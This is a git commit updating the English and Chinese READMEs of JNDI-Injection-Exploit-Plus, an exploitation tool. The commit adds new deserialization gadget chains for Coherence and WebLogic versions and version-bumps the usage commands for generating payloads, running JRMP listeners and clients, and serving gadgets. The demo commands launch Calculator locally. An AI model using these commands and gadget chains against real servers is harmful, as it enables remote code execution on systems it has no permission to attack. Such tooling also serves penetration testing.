update readme

cckuailong · cckuailong · commit ecc9509785e7 · 2023-03-02T10:54:32.000+08:00
diff --git a/README.md b/README.md
@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 58)
+#### 3. Deserailization Gadget (total: 64)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -51,6 +51,8 @@ Coherence1 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0,
 Coherence2 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
 Coherence3 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
 Coherence4 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
+Coherence5 :arrow_up:           |@cckuailong                 |coherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
+Coherence6 :arrow_up:           |@cckuailong                 |coherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
 CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2
 CommonsBeanutils2 :arrow_up:   |@cckuailong                 |commons-beanutils:1.9.2
 CommonsCollections1 |@frohoff                    |commons-collections:3.1
@@ -97,6 +99,10 @@ Weblogic4 :arrow_up:           |@cckuailong                 |weblogic.common.int
 Weblogic5 :arrow_up:           |@cckuailong                 |weblogic:12.2.1.4, coherence
 Weblogic6 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
 Weblogic7 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
+Weblogic8 :arrow_up:           |@cckuailong                 |weblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
+Weblogic9 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
+Weblogic10 :arrow_up:          |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
+Weblogic11 :arrow_up:          |@cckuailong                 |weblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 WildFly1 :arrow_up:            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 
@@ -118,15 +124,15 @@ Apereo  | Apereo 4.1 Deserialization RCE
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### Web service to return Deserial Gadgets
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar
 ```
 
 ```shell
@@ -146,7 +152,7 @@ P.S. Param wrapper & output is opetional
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -176,7 +182,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
 ```
 
 where:
@@ -194,13 +200,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -212,7 +218,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -243,7 +249,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:
diff --git a/README_zh.md b/README_zh.md
@@ -12,14 +12,14 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目
 
 - 远程Reference链 （3种）
 - 本地Reference链 （4种）
-- 反序列化链（54种）
+- 反序列化链（64种）
 
 P.S. 具体利用链名称及依赖见 [表格](./README.md)
 
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 #### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A]
 1. 运行工具
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
 ```
 
 ![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
 ```
 
 #### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D]
 1. 普通
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 ![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applica
 
 - JRMPListener
 ```
-java -cp JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 ```
-java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 #### 提供反序列化包装器
@@ -111,15 +111,15 @@ Apereo  | Apereo 4.1 反序列化漏洞
 - 示例
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### 可以返回反序列化数据的web服务
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar
 ```
 
 ```shell
